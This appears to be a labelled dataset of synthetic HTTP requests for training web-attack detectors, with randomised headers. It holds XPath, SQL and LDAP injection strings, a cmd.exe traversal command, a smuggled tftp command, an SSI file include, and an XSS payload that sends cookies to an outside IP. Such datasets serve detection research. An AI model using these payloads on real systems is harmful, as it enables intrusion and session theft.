End - Id: 46989
Start - Id: 48549
class: XPathInjection
POST /rnnssese3bEza/adleertfdapP/Rj0a/B@6xlD/alBqle/n--Eu/sesondCuT6e7wsecc/egIz/mz/srt/0g/bw.dll? HTTP/1.0
Content-Length: 302
Content-Language: rhinslai
Content-Encoding: deflate
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: aEJiaWRyRmV5ZG9veHJyZg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Sep 04 10:52:23 UTC
Last-Modified: Thu, 17 Jun 04 06:09:51 UTC
Host: www.2uo7eddEi.com:74
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, windows-1257, windows-1250, x-mac-ce, koi8-r
Accept-Encoding: identity
Accept-Language: onxbip-en;q=0.2
Cache-Control: no-store
Client-ip: 220.175.249.82
Cookie: eugRibeeG=5;iaeortiaxgen=emcikemetakuazbore
Cookie2: $Version="96"
Date: Wed, 02 Mar 05 10:36:45 UTC
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: "_OI8HS55.v3-p4_NewN8"
If-Range: *
Max-Forwards: 28
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest algorithm=tlhnLxz1
Range: 4-,9-
Referer: http://www.ehinhj4m.cz/Vzqta/neitur/hryg/ssaimeE/slaos.aspx
TE: chunked;q=0.8,trailers
Trailer: If-Modified-Since
User-Agent: 5rlnhhhg/2.1.9
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/9.7 143.89.197.3, HTTP/3.0 www.oricnAfx.jpeg
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmior0=8313    or    count(path/child::node()[position()=((i+j+k+l+1)]     | path/child::*()[position()=(k+1)])=1    or     43670=&cOlr8t=pal&Uur=boot.ini0e&jOs7R2secho.GobjectJ=571698&cecuieetd4=sblTeeeauesrl&werg=7796&asoppl=rTGIy

End - Id: 48549
Start - Id: 36614
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.ie6a.de
Connection: u4oe
Accept: audio/basic, text/*
Accept-Charset: iso-2022-jp, x-mac-arabic;q=0.8, x-mac-arabic, cp-950
Accept-Encoding: deflate;q=0.1
Accept-Language: a-t, tme-usdigt, tkdgjkxo-Hd1
Cache-Control: no-store
Client-ip: 34.3.142.249
Cookie: hssccsHahhsm=Eaae/ot'iE ;eoe=509;zr=@E;75k6CunionGiiKV1=53
Cookie2: $Version="9"
Date: Fri, 03 Sep 04 23:59:23 UTC
ETag: "3FW1P6WeZ_tcD9N"
Expect: eeKDayi
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 09 Jun 05 17:45:17 UTC
If-Unmodified-Since: Wed, 21 Sep 05 17:41:10 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 02:16:37 CET
Max-Forwards: 574
MIME-Version: 1.9
Pragma: dpags=th2dia
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest qop=auth
Range: 8050-
Referer: http://bsaeld3b.uk/wft5TO.php4
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 0.8; t5-4h; rv:3.7.7) Gecko/75820373
UA-CPU: MIPS
UA-Disp: 5747,1006,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: lxati/9.6 188.150.241.28, 4.2 254.241.168.88:7635
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36614
Start - Id: 41971
class: SqlInjection
GET /dl7ibebwgc3tliATtn/eatwmaanko/iklTA@7b5jsl_PA7CO/lGW/zy.nG0.Kwa/a5IKRLJz/oXD7Wt/2zhqreyVt-Mh0VX6roGa/xdeot.jpeg?1T@4P=OR+++++%27mt%27++++%3D++N%27++%27 HTTP/1.1
Host: 45.242.57.246
Connection: gooSfne
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ansratro-xmdleihe;q=0.7, hCiE6U-rrpdaEit;q=0.0
Cache-Control: no-store
Client-ip: 124.187.36.33
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="6"
Date: Mon, 02 Apr 07 09:26:38 GMT
ETag: "F6yDl2ELctqx5Q34"
Expect: 100-continue
From: 7SEma7le@snwitHoOk.it
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: "dxvF6lyQDbQTXq9joK"
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 3455
MIME-Version: 0.8
Pragma: h=6
Proxy-Authorization: awzeh4 1EetAatb=raaaa9e
Authorization: NTLM c25kYW9pSXRyOWh3bHd0VGVlbmlJZWxtYVJTYmVidG9yeUZucHRkbGM4M3RkeXU=
Range: 991-40833,238399-36
Referer: http://aeEqhr.st/lysb1/issuox/afeeLail/eada/o7mdg.swf
TE: trailers,chunked;q=0.7,trailers
Trailer: If-Range
User-Agent: Mozilla/8.1 (Windows; U; Win98 0.0; Gu-nb; rv:1.5.6) Gecko/54368441
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: HTTP/2.7 www.e1fsorj.tiff, 2.5 85.169.153.48, 4twbt/4.1 59.126.200.32
Transfer-Encoding: deflate
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 878 www.m8otxgo2.html "lOumtte0b2oihqtE7us5" "Tue, 26 Dec 06 07:16:10 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41971
Start - Id: 38531
class: LdapInjection
GET /tVlGMZH6q9Cq.png?jino=e4sddLnlima%7Ean5&tgtqv=750383&iiu3shitAm=%5Cdt5passthruuetv%3F9&emGj=%29++++%28+++%7C++++%28+++cn%3D*o++++%27brien*+++%29%28mail++%3D*o++++%27brien*++++%29 HTTP/1.1
Host: 241.60.28.138
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15;q=0.7, iso-8859-5;q=0.8, windows-1250;q=0.0, x-mac-chinesesimp;q=0.0, windows-1258;q=0.9
Accept-Encoding: identity;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 101.131.250.156
Cookie: etsnqlhhvaAsat=jX33dXTIYFO;jueRreeeinuizyb=andTiathiuw;cVpjbsh=ksA|
Cookie2: $Version="13"
Date: Sat, 29 Nov 08 05:28:20 GMT
ETag: "vApdEuQf@AgtqJaUkZ"
Expect: aieFs
From: n9eatae@mdeel.gov
If-Modified-Since: Wed, 23 Dec 09 07:59:59 UTC
If-Unmodified-Since: Sat, 18 Nov 06 02:11:00 GMT
If-Match: *
If-None-Match: "Vp@_Fe9Jyf29sQHX"
If-Range: Sun, 19 Sep 04 20:43:32 GMT
Max-Forwards: 896
MIME-Version: 4.8
Pragma: Tpoonmt=c8iyo
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: -491426,38-440
Referer: /Mfus.mp3
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 4.1; rr-ah; rv:9.4.0) Gecko/64048257
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8726x4401
Via: 6.7 www.ahhw5.png:61761, 8.3 www.hehoe.gif
Transfer-Encoding: ncsten; sl6taOp4=ickrge
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38531
Start - Id: 44554
class: OsCommanding
GET /0NmetakV/ePipgf2REor2jO7iQGc/FA34aADnph-YvS/ex@KY5m39g/damogns/taoiioja/n0n/i7Wz3DJLSkPnNwDyj9/KKxtermnph-l/-envlpsdocumentx/7eraCblktdDx1ilOn/5telnetp.asp?ezt4E6p=6220216&ehee=34&To=teca&icnstesbs=ltwtrq&Ftbetween.iEk-qlib-=lio&sa=55458455&8n5D6tchhaHqs=+het%3A+wdu&YetseergEanr=rA89eimputWere&3jeuwtmox=hdaf44%29+dnde&Nadr=1402006&osp38tmr6hTn=458220&tw0apayt9mes=199844&talimka0=oE.nAL&tte8=d6mkesw7qxiso HTTP/1.1
Host: www.iamie.com
Connection: keep-alive
Accept: text/*;q=0.9, image/*;q=0.1, application/zip;q=0.0
Accept-Encoding: deflate
Accept-Language: ruaacc-uryqo;q=0.2, gans-abg;q=0.6, diaet-fisrL;q=0.0
Cache-Control: min-fresh=95251
Date: Wed, 31 Aug 05 13:29:27 CET
Expect: 0l7cwity
If-Modified-Since: Sun, 09 Apr 06 22:30:01 CET
If-Range: "0KQc.MK_t_kJMtA"
Max-Forwards: 1
MIME-Version: 5.9
Referer: /pGHxen/rtee/geobgsm/pe7trb/vLic.tiff
User-Agent: 203.108.66.182   ;  tftp 192.168.10.33 test.txt

null

End - Id: 44554
Start - Id: 41586
class: SqlInjection
GET /OAbVP/hFNt7_0K/bhagidsSejrneh/e6utilj@IYYPWdpgUdz4/nxUqFxlCoPNkmn.sr/y6e4pSr0M5eS9/SNk9PQU@2Jscript4A9K.asmx?tt=h5TEn&isdyrsy=8utiO+QkHnrir%5Bbtutwt&eao1ioti4tp3odh=wPnle9t%3Fh7&nLnyndoeu=71154896&7Rcbmctnn=+ngnm&rshohnewAof=rne1hce3luw9n&c1sjeyen=465&lPfromNftpqtdivmincludePG=aS%40t.S_WH-lZ&sso=l-imgewlleeoi&TphpvKdropp=9E2iMrwuolqn4s&hoepege8=%27%29+++UN%2F**%2FION++++ALL+SEL%2F**%2FECT+++++%27St%27%2C2764%2C2324%2C%27tih5%27%2C9+++++FROM+++++hbom+WHERE++%28++++%27%27%3D+++%27 HTTP/1.0
Host: www.wkry.gov
Connection: yecjee2p
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: h5aSw-aTu0, jbpihx-9ia;q=0.1
Cache-Control: max-age=7
Client-ip: 38.173.11.46
Cookie: noffnh5oAj0kscW=:suAf1euaccept3 zJkb;beQJGiframej=309764
Cookie2: $Version="8"
Date: Sat, 11 Oct 08 19:16:43 UTC
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Thu, 13 Oct 05 15:48:28 CET
If-Match: *
If-None-Match: *
If-Range: "GmVN6FHhcyf_pMA"
Max-Forwards: 1770
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: Basic MWdkZjpob2lydA==
Range: 572-0
Referer: http://www.rj3aoOtt.it/rciuuoxz/souanOt/t2be/entnerek/od6dL.html
TE: deflate
Trailer: If-Range
User-Agent: Quiw9nhtusprb
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3931x2579
Via: FTP/7.3 www.jhhh4c7s.gif, FTP/6.4 180.37.43.147
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41586
Start - Id: 37228
class: LdapInjection
GET /e4L8pV9UC@yl7a.cgi?jfndy=w%40akfu&nd-0=913%29%28%26%28objectClass%3DONi%29%28%7C%28sn++%3D++i1ia%29%28cn%3Dila+++J*%29%29&jF2P1RnwL1O=f.pO-qVa_q HTTP/1.0
Host: 117.212.18.240
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: nbcs-s;q=0.8, eemu-udoet;q=0.0
Cache-Control: min-fresh=45
Client-ip: 129.26.176.46
Cookie: laec0s=51
Cookie2: $Version="057"
Date: Mon, 13 Dec 04 23:25:31 CET
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: htani@cbat2ads3.org
If-Modified-Since: Mon, 16 Aug 04 18:47:45 GMT
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "UheVQ0s7cPPUNYaKK"
If-None-Match: *
If-Range: Thu, 25 Nov 04 14:47:14 GMT
Max-Forwards: 4919
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eteseefo"
Authorization: Basic ZUFyYzpod2Q4b3loYw==
Range: -035
Referer: /oenor/plfyd/b5retb.msf
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: nd7shxsicl8o
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 5.4 218.57.23.110, 1.0 www.tboi.tiff, 1.9 137.191.131.90
Transfer-Encoding: identity
Upgrade: TrRiy/4.3, rsibt/9.4
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37228
Start - Id: 48991
class: XPathInjection
GET /likee/pL-1c/oR/dhEondueqsSh/SSopteF0yW/exiee.bin?pPE5fhedpe=neihtsil&yose8adllhdp0=70&LtashhsdDohsvs=+escriptl&RnoUrtfe=80++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++8219%3D&tesmAbrwni2t=rw&muA3rO3ATuMulm=o&heatieeieo=1jEducsz HTTP/1.1
Host: 177.26.202.245
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.7, iso-8859-4;q=0.4
Accept-Encoding: gzip
Accept-Language: fa-num, Atuatf-ta;q=0.6, g8-ye, tmOaEt-hsa, oAt-e;q=0.8
Cache-Control: max-stale
Client-ip: 102.111.118.138
Cookie: elebeH65c=thft02ddlamseoyhlh;8sOmao9eouker=14485
Cookie2: $Version="778"
Date: Tue, 17 Mar 09 03:31:00 GMT
ETag: "L18TtWv_HO4fi5oihf"
Expect: 100-continue
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Sun, 29 Aug 04 08:59:11 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6230
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: NTLM bW9lbHRpd2Y3cmVjbWhycHRpYW1jbHRpaWFoaGVoNnd5
Range: 23-,057-,45-
Referer: http://www.weoioa.be/ukwir/yNiehed/hrmneato/yvtistn/srtypr4l.nsf
TE: trailers,gzip,gzip
Trailer: From
User-Agent: gUVkSqm http://www.ttrfi.net
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: ee4/7.2 21.82.169.182
Transfer-Encoding: compress
Upgrade: ttdCe/0.8, oa8sie/8.1, wteoa/2.2, Lsat/9.3
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48991
Start - Id: 35101
class: SqlInjection
GET /kzmJM3jP2eRL/katrleo/ubndbdmT.tiff?sse0lnqz=1364&uctPfphRFuHp=+m%29&2esaGN5ncy=6457072&mcwZn9XX=65688&fmdrertpl=g+st&Nerafo=jcP3de&me3hmrqn9ie=Legroup+byand&agC7kgrjblr=15203 HTTP/1.0
Host: www.eldbam.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ejrr-c2ae, lc-teczL;q=0.5, pdsunnxe-sshoa;q=0.2, I-2g6;q=0.0, 4h-oetah
Cache-Control: min-fresh=402
Client-ip: 186.212.136.62
Cookie: ryrncel=7452332;thshn=5;cmaari1n=')     UNION     ALL     SELECT stu3    ,   ahehvuo7     ,  bha71    FROM     7fs     WHERE  tdhynthtr   NOT    IN    (    'rdertNjr')     AND   Oaeea  NOT     IN    (  'spt'   )    AND ''  =  ';dga2oongy6i=fti)a
Date: Sun, 15 Apr 07 20:13:54 CET
ETag: W/"rxq4LoFVb5IbCGNLEAl"
Expect: 100-continue
From: iomcsT@steee.cz
If-Unmodified-Since: Tue, 04 Jul 06 07:21:50 CET
If-Match: "teQ2-LdyUx-8ute"
If-None-Match: *
If-Range: Wed, 20 Aug 08 04:30:51 CET
Max-Forwards: 644
Pragma: no-cache
Proxy-Authorization: 9esniq Uadtnog=kHioniye
Authorization: NTLM cmlzNW5hZWVqdHRkMXNzaXRpZWRVbGVvM1R0cmludHRp
Referer: http://www.inhg.it/aayIiuOS/9g6rn33s/rbmeeB/at0k/eratct.gif
TE: trailers,deflate;q=0.7,chunked;q=0.2
Trailer: Range
User-Agent: czmd9r6yRe (fisLT.Vj; d7sukuLDAG; td1GlwK; sfKuWYMq; 1@MWmkMoGd)
UA-CPU: Sparc
UA-Disp: 6684,2731,32
UA-Color: color32
Via: 0.2 www.wotttz.png
Transfer-Encoding: deflate
Warning: 874 167.83.202.83 "dOrvOwtenst7t2ivdo7" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35101
Start - Id: 49204
class: XPathInjection
GET /tmoh4esuTn/e7DlPKQc70C.asmx?ob1in8ttio=arosYr%27%5D++++%7C+++++P++%7C++++%2F%2Fuser%5B++name%2Ftext%28++++%29+++%3D+%27tasa&urtne=054312 HTTP/1.0
Host: 208.51.41.48
Connection: keep-alive
Accept: text/plain;q=0.3, image/*, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=71045
Client-ip: 0.187.188.191
Cookie: dtwlri=8 tt98)|anl;ndt4p=?link\likeem'pr%Eu9Rr8-Yea;tn3=yHJCzARfzq;hsvn=tSapobceznnkues;rrauOah4arqui=iJ@inarpassthruRtn7idekuinput$;SDHWpJ=aH2t7
Cookie2: $Version="2"
Date: Thu, 23 Jul 09 02:08:24 CET
ETag: "_DeHBysckI4RzyNKLtM"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: "ZTp1rxuw.WpEPG_"
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: /1El4t/wMspi/6wcasr.asmx
TE: trailers,deflate;q=0.2,deflate
Trailer: Authorization
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 9.0; rz-ea; rv:1.5.1) Gecko/78363819
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49204
Start - Id: 46815
class: XSS
POST /gaceeiph4oxsorai/orcu01t/eFW-FOz/tKM-SXz/aidbtl6TXurspsai2E.php3? HTTP/1.1
Content-Length: 427
Content-Language: wltedmu,lnanae,f2ceints
Content-Encoding: deflate
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: MGthYXRkZ2Vvcmlybnl0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Jun 08 09:41:20 UTC
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.3hryie0.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip, deflate;q=0.8
Accept-Language: isa5du-uyja7, ihh-o7s;q=0.0, ibn-a, dnzi-n, 0nht-hh
Cache-Control: no-cache
Client-ip: 180.151.251.196
Cookie: unf2aluhntotlf=163;zmyrraAq=76
Cookie2: $Version="66"
Date: Mon, 08 Jun 09 06:19:11 GMT
ETag: "y@tKjzaOGXeONi4MFD"
Expect: taanns
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Tue, 02 Jan 07 08:51:48 CET
If-Unmodified-Since: Wed, 08 Jul 09 08:58:31 GMT
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: *
If-Range: "YD6XMAxqs63vQr7PDw"
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://sspspds.com/09smoe.sh
TE: trailers,gzip;q=0.3,trailers
Trailer: Referer
User-Agent: 4syfdtieaeBdnminjhe
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 7.3 www.r7eFut.css:6
Transfer-Encoding: identity
Upgrade: haroE/4.5, c7ae2/5.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bmtADt6=8291&MperlZexecJwye=sSFr&-7ulikeM9=<xml  src  =    "  javascript:   [window.open('http://125.155.116.147/onat.cgi'+document.cookie);]   "   >&OrobhGliEnn=objectie/i/n0di]nh'includef&pNeyestS7Ihik=wn7uscriptnyarcr?tb&Gbodynull5T0=rial&a5tswra=itnode&cya2eahae6a2=tjohe&tmh26=983166&Agopi=23002&ldyomwmgiataSL5=86072&sbshisonebdth=mhe &nX0TO_WJEallW=35725396&8wrCbfcw=at(1t

End - Id: 46815
Start - Id: 40513
class: SSI
GET /nKcjgI8JVsp6/dszvzn3P52YH/dV@2/lC@97p/kroN9eteieltfowese/co/Sq@@/hEs6Yi0IhteaxorMdi/Yf/6Q.bzIBDiwb./hweGueet2sxhlpteeygE/knem2lZq0c.sh?D2ore=43421887&te6nrh=ur&aAvonochdeisee=5015423&wOO6fCVKA3admin=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&NSqI23OL0@=2e HTTP/1.0
Host: www.eoi6tlic.uk
Connection: elcisfhm
Accept: */*;q=0.3
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: Yy-BuMbd;q=0.4, qoT-ohDeO, 2r-nri0hi, oriew02S-qlexmEh;q=0.1
Cache-Control: no-cache
Client-ip: 197.126.44.202
Cookie: saoa=ee5MaUaL;iegaoats=788788;fbn=dt7e5Ks;3sak6=src'fw=ss0nelwinntt;ae9adibId=8370
Cookie2: $Version="046"
Date: Sat, 11 Nov 06 07:44:03 UTC
ETag: "YoCd.ppwExewST-Z"
Expect: 100-continue
From: ahew8h@v0rtaRr.ch
If-Modified-Since: Mon, 24 Jul 06 01:31:00 CET
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: *
If-None-Match: "ulXJbbnoCNdic9EPEz"
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 5934
MIME-Version: 4.1
Pragma: z=6edn9Nt
Proxy-Authorization: mmone heot=htan
Authorization: NTLM Y0J0cmVhcm5hcnJhZWdiZW9jYWxzN2syY3pyOHR0c3JhaWtmeGQ=
Range: 049-19497,328865-,-538
Referer: /OuneAzs/imafy/omtt/atiLhdt.pdf
TE: trailers,gzip;q=0.5,trailers
Trailer: TE
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 5.2; yr-ft; rv:7.2.7) Gecko/29695981
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: zpoIe/2.8 241.60.196.30, 2.7 180.154.203.58
Transfer-Encoding: identity
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40513
Start - Id: 48661
class: XPathInjection
PUT /yotrmntfuorea8ihto4/e-SqE.f@vfQ/sh5uD4C4P9amOOA0/u4e9tuiwH7lteUes/nORSU/appk-paMA.1j/Y7eetmn07rediyefrft9.jpg? HTTP/1.0
Content-Length: 359
Content-Language: Cn
Content-Encoding: compress
Content-Location: http://inn1hlfw.st/seaobnx/8mezww7r/emnaej/srtnj.js
Content-MD5: YnRibmVybjVibmFzZnVscw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Sun, 01 Jun 08 20:03:58 CET
Host: 150.30.81.247:48
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-9;q=0.3, gb2312, x-mac-korean;q=0.5, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 125.212.241.80
Cookie: somrliQnh=location;SctedSe2ep=itbmr
Cookie2: $Version="57"
Date: Tue, 26 Sep 06 14:31:01 UTC
ETag: "VLqyCk.CKfLHgYarbRgi"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Sat, 21 Jul 07 03:29:41 GMT
If-Unmodified-Since: Sat, 15 Sep 07 12:25:35 UTC
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: "pSpDZdI0j2UD46mlVMac"
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: 12-
Referer: http://Lkt0Rg6l.it/ea37.jsp
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.5 (X11; U; Solaris 4.2; ih-6i; rv:4.6.0) Gecko/04457228
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/3.0 www.rultehs.html, 3.8 193.254.34.238
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

escieseksg=316&le6=nvh&neeirqSo=si&usc9=46193&ntoharhkncrt9n=9ynhmgdt'  or     path/child::node()[position()=N]    or 'rtebewr'  =   '&chofD=k@&twyat0ion\z&exthald=699674513&fiseeSenzei=egJoa&DGAT2VC=h sfc so&tbocesnk0euioe=5&8aRbyD=07749975&3neyt3khln=q11i&nhorh=ttmangilnttlaS&ah4oeispa4=tbsytPgste&Ibody3DxtermP=27365763

End - Id: 48661
Start - Id: 45794
class: PathTransversal
